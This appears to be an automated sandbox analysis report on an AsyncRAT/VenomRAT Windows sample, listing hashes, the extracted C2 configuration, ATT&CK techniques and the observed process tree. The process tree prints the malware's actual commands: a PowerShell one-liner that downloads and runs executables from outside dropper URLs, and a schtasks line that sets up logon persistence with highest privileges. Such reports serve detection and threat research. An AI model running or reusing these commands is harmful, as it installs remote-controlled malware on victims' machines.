asyncrat | 35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18-08-2024 18:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
Size

75KB
MD5

29c2e3cf6ffd3a12ff257346d868c54c
SHA1

34494b45a3424e3966db318da27845883a054052
SHA256

35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e
SHA512

41b537ea71f85e4d9d70205647145fc216c2b81eb4951e1518bda2e46e7f6bf31f04ea5ae88ec9b8e1db23e9a8a020c8c429eba722ee460dac7a6e129705a9c1
SSDEEP

1536:gikU7cX0OzCoXPMRkIKt2OlY6H1bf/iQHha5kzkSLVclN:gDUaT9PMRkIv4jH1bfVha5kLBY

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu.exgaming.click

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

38.153.61.81:16387

Mutex

uxhgglgtkj

Attributes

delay
1
install
true
install_file
system.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

VenomRAT 2 IoCs

Detects VenomRAT.

rat

Processes:

resource	yara_rule
behavioral2/memory/1984-1-0x0000000000E50000-0x0000000000E68000-memory.dmp	VenomRAT
C:\Users\Admin\AppData\Roaming\system.exe	VenomRAT

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\system.exe	family_asyncrat

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exesystem.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	system.exe

Executes dropped EXE 1 IoCs

Processes:

system.exe

pid process

4928 system.exe

pid	process
4928	system.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
208	powershell.exe
2676	powershell.exe
3608	powershell.exe
4984	powershell.exe
5056	powershell.exe
1776	powershell.exe
1752	powershell.exe
5104	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4168 timeout.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3292 schtasks.exe

pid	process
4168	timeout.exe

pid	process
3292	schtasks.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

powershell.exepowershell.exe35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesystem.exepowershell.exe

pid	process
5056	powershell.exe
5056	powershell.exe
1776	powershell.exe
1776	powershell.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
208	powershell.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
208	powershell.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
2676	powershell.exe
2676	powershell.exe
1752	powershell.exe
1752	powershell.exe
5104	powershell.exe
5104	powershell.exe
3608	powershell.exe
3608	powershell.exe
4928	system.exe
4928	system.exe
4984	powershell.exe
4984	powershell.exe
4928	system.exe
4928	system.exe
4928	system.exe
4928	system.exe
4928	system.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exepowershell.exepowershell.exepowershell.exepowershell.exesystem.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	4928	system.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	4928	system.exe
Token: SeDebugPrivilege	4984	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

system.exe

pid process

4928 system.exe

pid	process
4928	system.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.execmd.execmd.execmd.exesystem.execmd.exe

description	pid	process	target process
PID 1984 wrote to memory of 2444	1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe	cmd.exe
PID 1984 wrote to memory of 2444	1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe	cmd.exe
PID 2444 wrote to memory of 5056	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 5056	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 1776	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 1776	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 208	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 208	2444	cmd.exe	powershell.exe
PID 1984 wrote to memory of 4900	1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe	cmd.exe
PID 1984 wrote to memory of 4900	1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe	cmd.exe
PID 1984 wrote to memory of 1312	1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe	cmd.exe
PID 1984 wrote to memory of 1312	1984	35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe	cmd.exe
PID 4900 wrote to memory of 3292	4900	cmd.exe	schtasks.exe
PID 4900 wrote to memory of 3292	4900	cmd.exe	schtasks.exe
PID 1312 wrote to memory of 4168	1312	cmd.exe	timeout.exe
PID 1312 wrote to memory of 4168	1312	cmd.exe	timeout.exe
PID 2444 wrote to memory of 2676	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 2676	2444	cmd.exe	powershell.exe
PID 1312 wrote to memory of 4928	1312	cmd.exe	system.exe
PID 1312 wrote to memory of 4928	1312	cmd.exe	system.exe
PID 4928 wrote to memory of 4244	4928	system.exe	cmd.exe
PID 4928 wrote to memory of 4244	4928	system.exe	cmd.exe
PID 4244 wrote to memory of 1752	4244	cmd.exe	powershell.exe
PID 4244 wrote to memory of 1752	4244	cmd.exe	powershell.exe
PID 4244 wrote to memory of 5104	4244	cmd.exe	powershell.exe
PID 4244 wrote to memory of 5104	4244	cmd.exe	powershell.exe
PID 4244 wrote to memory of 3608	4244	cmd.exe	powershell.exe
PID 4244 wrote to memory of 3608	4244	cmd.exe	powershell.exe
PID 4244 wrote to memory of 4984	4244	cmd.exe	powershell.exe
PID 4244 wrote to memory of 4984	4244	cmd.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
"C:\Users\Admin\AppData\Local\Temp\35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4900
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9337.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1312
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:4168
- - C:\Users\Admin\AppData\Roaming\system.exe
    "C:\Users\Admin\AppData\Roaming\system.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4928
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4244
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1752
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
380c5577608cea1171aec5bb642be68f

SHA1
6246a27767fc2d46f3a7c15d8eda791f50d430bf

SHA256
81393ddeb2ae3cd66f4c241be776663ca49eed20ab11ec76a63e19f6fe717f18

SHA512
008295cd2c190a1f456f1c19c7dac027d721e4a1ebae28821d04eb633afd063c374e2538b3c081f0e491bc3c7f4693da768b6eab91f2872dda491ad211eb1d6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aa8efa56e1e40374bbd21e0e469dceb7

SHA1
33a592799d4898c6efdd29e132f2f76ec51dbc08

SHA256
25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

SHA512
ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b0cfdab278bf3db6d14817b1e701e4ee

SHA1
7ec7d56340dcaff7b6bf3d0e4b35be5bd57e87b8

SHA256
0554687e2254846915ac9d734989c77cfc0417bdd6607dd64dde2fb2dcc55854

SHA512
40a621b3ef79c9f74c937b4f04ef18bcc78bc7436c2035885bd8651b4ffc072152c6e87087be432c43860256c5e89ef33d57bb27822d36f18b8b9bda9208d4ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a208c571088d581ed1cff67c82c3231

SHA1
5b802657f058aa7911a107322cbcfab912082249

SHA256
35bf4ed3c9ae5916197f4b982ae18ac489ec2057ec78933c7fb6160b55e704bd

SHA512
9a5807a02b878949c803d451a03f50a471e9eef80dacf13302e5a9b7aa25b0ed62ddce57b6c6a3170a6cd0deb6edf7bdfb98ece0c429744c8d0ac24584b99479

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cd1faf606b7f84f8a42a02467a4bac92

SHA1
48422313e4da72b4d4cffe1898d46a1c4585d253

SHA256
328632cc99f0ed5eaceacb862269e4d01913a540b0cf482d6ccc97361f34dd37

SHA512
2ee00b7adb5d0c87e3ea038cc07b543f1527dd24bc1382b539ef269490c7f32eef66ac4efec164c7005f95bb59919af1664516a16be368df3319a906e7db91c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
16457aa897bd3d84ccb4d57e9b4b1ad2

SHA1
7deedc03c49f9125a576bd6533523e7d872fd885

SHA256
c1c16d80b35632a98482eda2920b8d6cc5f5abf2b2c2e5069492f43e28e8cb05

SHA512
4f64f0ebc161732032faeba3d7d005b3786de84888770f772bdec0a18c09ac52071dcbe22d5a9e4066155f3352f570795ebea55abbec6b7712113f06e476bca9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2095963cbe05e95fb70b2bd3b12fae62

SHA1
e6cd97af1a757b4291154765c6cfa49c856d9b8c

SHA256
3be78036b73ae8b76fb24dedd2769724d80df5390a43640eb1b0218ae430c84a

SHA512
e4a2d46a721b1d88bfac84d4553e440fdf456c077e3b1f055a58fca0546021db04dcedcbc166d703da1b87393ac762c0f6dfa0aa8426845c67665860f2d7a96d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zq2btxsq.zmr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9337.tmp.bat

Filesize
150B

MD5
ed50bac0556ebeba2993240f100cf958

SHA1
e9eae52a1de4dc71747a465debab869823d9f0f4

SHA256
afb3c16eca8f67f998b52353b91588191c2ef59178783f1b90b8f4b98ad1ab3e

SHA512
be151853f2eb8f6144b2d6909aed3b3a983fd13d406b91e5f95c1ec7ec4ca425802393321ae84b681da2d38fb9ee2fed58e886fb75034efaaddf80fb1949f194

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
C:\Users\Admin\AppData\Roaming\system.exe

Filesize
75KB

MD5
29c2e3cf6ffd3a12ff257346d868c54c

SHA1
34494b45a3424e3966db318da27845883a054052

SHA256
35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e

SHA512
41b537ea71f85e4d9d70205647145fc216c2b81eb4951e1518bda2e46e7f6bf31f04ea5ae88ec9b8e1db23e9a8a020c8c429eba722ee460dac7a6e129705a9c1

Download Submit
memory/1984-46-0x00007FFF544B0000-0x00007FFF54F71000-memory.dmp

Filesize
10.8MB

Download
memory/1984-0-0x00007FFF544B3000-0x00007FFF544B5000-memory.dmp

Filesize
8KB

Download
memory/1984-3-0x00007FFF544B0000-0x00007FFF54F71000-memory.dmp

Filesize
10.8MB

Download
memory/1984-1-0x0000000000E50000-0x0000000000E68000-memory.dmp

Filesize
96KB

Download
memory/5056-19-0x00007FFF544B0000-0x00007FFF54F71000-memory.dmp

Filesize
10.8MB

Download
memory/5056-16-0x00007FFF544B0000-0x00007FFF54F71000-memory.dmp

Filesize
10.8MB

Download
memory/5056-15-0x00007FFF544B0000-0x00007FFF54F71000-memory.dmp

Filesize
10.8MB

Download
memory/5056-14-0x00007FFF544B0000-0x00007FFF54F71000-memory.dmp

Filesize
10.8MB

Download
memory/5056-13-0x0000022C0E800000-0x0000022C0E822000-memory.dmp

Filesize
136KB

Download